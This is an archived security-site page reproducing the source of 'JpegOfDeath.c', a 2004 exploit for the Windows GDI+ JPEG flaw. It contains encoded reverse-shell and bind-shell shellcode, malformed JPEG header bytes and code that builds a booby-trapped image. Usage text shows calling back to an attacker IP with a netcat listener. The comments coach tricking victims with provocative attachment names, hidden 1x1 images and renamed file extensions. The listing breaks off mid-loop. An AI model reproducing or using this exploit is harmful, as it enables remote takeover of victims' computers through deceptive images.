TUCoPS :: Windows :: hack2443.htm

NEW GDI+ JPEG Remote Exploit
NEW GDI+ JPEG Remote Exploit



/***************************************************************

 *

 * GDI+ JPEG Remote Exploit 

 *  By John Bissell A.K.A. HighT1mes

 *

 * Exploit Name:

 * =============

 *  JpegOfDeath.c v0.5

 *

 * Date Exploit Released:

 * ======================

 *  Sep, 23, 2004

 *

 * Description:

 * ============

 *  Exploit based on FoToZ exploit but kicks the exploit up 

 *  a notch by making it have reverse connectback as well as

 *  bind features that will work with all NT based OS's.

 *  WinNT, WinXP, Win2K, Win2003, etc... Thank you FoToz for

 *  helping get a grip on the situation. I actually had got

 *  bind jpeg exploit working earlier but I could only 

 *  trigger from OllyDbg due to the heap dynamically changing...

 *

 *  If anyone who uses this exploit has used my recent AIM 

 *  remote exploit then you will have a good idea already of how

 *  to use this exploit correctly.

 *

 *  Through my limited testing I have found on a unpatched 

 *  XP SP1 system that if you click the exploit jpeg file

 *  in Windows Explorer then you will be hacked. I know there

 *  are more attack points you can take advantage of if you

 *  look for them.. So say someone goes on any web browser

 *  and they decide to save your jpeg and then later open it

 *  in explorer.exe then they will be attacked.. or maybe they

 *  got a email that has a good filename attachment title to

 *  it like "daisey fuentes porn pic.jpg" well then they 

 *  want to see it so they save it to there harddrive and open

 *  the pic in explorer.exe and game over. You just have to

 *  test and get creative. The reason this is version 0.5 is

 *  because I know rundll32.exe is MAJORALLY exploitable and I know

 *  that would make this exploit far more powerful if I 

 *  figured that part out.. I have already exploited it

 *  personally myself but I need to run some more tests to

 *  make things final for everyone... On another side note

 *  for the people out there who think you can only be affected 

 *  through viewing or downloading a jpeg attachment.. you're

 *  dead wrong.. All the attacker has to do is simply change

 *  image extension from .jpg to .bmp or .tif or whatever

 *  and stupid Windows will still treat the file as a JPEG :-p...

 *  Also the fact is this vulnerability is exploitable 

 *  without the victim clicking a link... For instance you

 *  send them the image with a 1,1 width,height and then'

 *  they can't see it in Outlook Express, so there like 

 *  man this image has a cool name so I'll try to open the

 *  attachment, then there FUCKED... Well ok they have to

 *  click in a round-about-way.. but I'm sure if you're

 *  creative enough with all those MS features you can figure

 *  something out ;-)

 *

 *  I'll most likely be putting out another version of this

 *  exploit (more dangerous) once more testing has been done. So 

 *  I encourage everyone out there to download SP2, patch your

 *  Windows systems, etc... Of course this won't be a 

 *  cure all solution :-/

 *

 * Note:

 * =====

 *  If someone wants to take advantage of the bind mode of

 *  attack in this exploit you will need to set up a script

 *  on a web server to check everyone who downloads the 

 *  jpeg exploit file and then connect back to them on the

 *  port you wanted to use with the bind attack... One of

 *  the reasons I decided to keep the bind shellcode option

 *  in here is because sometimes as you people know a

 *  firewall will be more restrictive on outbound connections

 *  and there are times where a bind attack will do just right

 *  if the reverse connect attack won't work... On ANOTHER

 *  note you can also rename your jpeg file extension to

 *  something like a .bmp or .tif and dumb Windows program's

 *  (most of them) won't give give a shit and try to load the 

 *  jpeg anyways... You can easily trick unsuspecting people 

 *  this way.. which is pretty much everyone.. right??

 *

 * Greetings:

 * ==========

 *  FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack

 *  Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,

 *  Nick Fitzgerald, Adam Nance (where are you?),

 *  Santa Barbara, Jenna Jameson, John Kerry, so1o, 

 *  Computer Security Industry, Rom Hackers,  My chihuahuas

 *  (Rocky, Sailor, and Penny)...

 *

 *

 * Disclaimer:

 * ===========

 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR

 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES

 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.

 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,

 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT

 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,

 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY

 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT

 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF

 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

 *

 * Look out for a better version of this exploit in a few days.. perhaps...

 *

 ********************************************************************/



#include 

#include 

#include 

#include 

#pragma comment(lib, "ws2_32.lib")



/* Exploit Data... */



char reverse_shellcode[] =

"\xD9\xE1\xD9\x34"

"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"

"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"

"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"

"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"

"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"

"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"

"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"

"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"

"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"

"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"

"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"

"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"

"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"

"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"

"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"

"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"

"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"

"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"

"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"

"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"

"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"

"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"

"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";



char bind_shellcode[] =

"\xD9\xE1\xD9\x34\x24\x58\x58\x58"

"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"

"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"

"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"

"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"

"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"

"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"

"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"

"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"

"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"

"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"

"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"

"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"

"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"

"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"

"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"

"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"

"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"

"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"

"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"

"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"

"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"

"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"

"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"

"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";



char header1[] =

"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"

"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"

"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"

"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"

"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"

"\x2E\x3E\x35\x35\x35\x35\x35\x3E";



char setNOPs1[] =

"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"

"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";



char setNOPs2[] =

"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"

"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";



char header2[] =

"\x44"

"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"

"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"

"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"

"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"

"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"

"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"

"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"

"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"

"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"

"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"

"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"

"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"

"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"

"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"

"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"

"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"

"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"

"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"

"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"

"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"

"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"

"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"

"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"

"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"

"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"

"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"

"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"

"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"

"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"

"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"

"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"

"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"

"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"

"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"

"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"

"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"

"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"

"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"

"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"

"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"

"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"

"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"

"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"

"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"

"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"

"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"

"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"

"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"

"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"

"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"

"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"

"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"

"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"

"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"

"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"

"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"

"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"

"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"

"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"

"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"

"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"

"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"

"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"

"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"

"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"

"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"

"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"

"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"

"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"

"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"

"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"

"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68";



/* Code... */



unsigned char xor_data(unsigned char byte)

{

	return(byte ^ 0x92);

}



void print_usage(char *prog_name)

{

	printf(" Exploit Usage:\n");

	printf("\t%s -r your_ip | -b [-p port] \n\n", prog_name);

	printf(" Parameters:\n");

	printf("\t-r your_ip or -b\t Choose -r for reverse connect attack\

 mode\n\t\t\t\t and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or\

 -b then a bind\n\t\t\t\t attack will be generated.\n\n");

	printf("\t-p (optional)\t\t This option will allow you to change the port\

 \n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind then\

  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is reverse connect\

  then the port you\n\t\t\t\t specify will be the one you want to listen\n\t\t\t\t on so the victim can\

  connect to you\n\t\t\t\t right away.\n\n");

	printf(" Examples:\n");

	printf("\t%s -r 68.6.47.62 -p 8888 test.jpg\n", prog_name);

	printf("\t%s -b -p 1542 myjpg.jpg\n", prog_name);

	printf("\t%s -b whatever.jpg\n", prog_name);

	printf("\t%s -r 68.6.47.62 exploit.jpg\n\n", prog_name);

	printf(" Remember if you use the -r option to have netcat listening\n");

	printf(" on the port you are using for the attack so the victim will\n");

	printf(" be able to connect to you when exploited...\n\n");

	printf(" Example:\n");

	printf("\tnc.exe -l -p 8888");

	exit(-1);

}



int main(int argc, char *argv[])

{

	FILE *fout;

	unsigned int i = 0,j = 0;

	int raw_num = 0;

	unsigned long port = 1337; /* default port for bind and reverse attacks */

	unsigned long encoded_port = 0;

	unsigned long encoded_ip = 0;

	unsigned char attack_mode = 2; /* bind by default */

	char *p1 = NULL, *p2 = NULL;

	char ip_addr[256];

	char str_num[16];

	char jpeg_filename[256];

	WSADATA wsa;



	printf(" +------------------------------------------------+\n");

	printf(" |  JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");

	printf(" |    Exploit by John Bissell A.K.A. HighT1mes    |\n");

	printf(" |              September, 23, 2004               |\n");

	printf(" +------------------------------------------------+\n");

	if (argc < 2)

		print_usage(argv[0]);



	/* process commandline */

	for (i = 0; i < (unsigned) argc; i++) {

		if (argv[i][0] == '-') {

			switch (argv[i][1]) {

			case 'r':

				/* reverse connect */

				strncpy(ip_addr, argv[i+1], 20);

				attack_mode = 1;

				break;

			case 'b':

				/* bind */

				attack_mode = 2;

				break;

			case 'p':

				/* port */

				port = atoi(argv[i+1]);

				break;

			}

		}

	}



	strncpy(jpeg_filename, argv[i-1], 255);

	fout = fopen(argv[i-1], "wb");

        

	if( !fout ) {

		printf("Error: JPEG File %s Not Created!\n", argv[i-1]);

		return(EXIT_FAILURE);

	}



	/* initialize the socket library */

	if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {

		printf("Error: Winsock didn't initialize!\n");

		exit(-1);

	}



	encoded_port = htonl(port);

	encoded_port += 2;

	if (attack_mode == 1) {

		/* reverse connect attack */

		reverse_shellcode[184] = (char) 0x90;

     	reverse_shellcode[185] = (char) 0x92;

		reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));

		reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));



		p1 = strchr(ip_addr, '.');

		strncpy(str_num, ip_addr, p1 - ip_addr);

		raw_num = atoi(str_num);

		reverse_shellcode[179] = xor_data((char)raw_num);



		p2 = strchr(p1+1, '.');

		strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);

		raw_num = atoi(str_num);

		reverse_shellcode[180] = xor_data((char)raw_num);



		p1 = strchr(p2+1, '.');

		strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);

		raw_num = atoi(str_num);

		reverse_shellcode[181] = xor_data((char)raw_num);



		p2 = strrchr(ip_addr, '.');

		strncpy(str_num, p2+1, 5);

		raw_num = atoi(str_num);

		reverse_shellcode[182] = xor_data((char)raw_num);

	}

	if (attack_mode == 2) {

		/* bind attack */ 

		bind_shellcode[204] = (char) 0x90;

     	bind_shellcode[205] = (char) 0x92;

		bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));

		bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));

	}



	/* build the exploit jpeg */

	j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;

      

	for(i = 0; i < sizeof(header1) - 1; i++)

		fputc(header1[i], fout);

	for(i=0;i

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH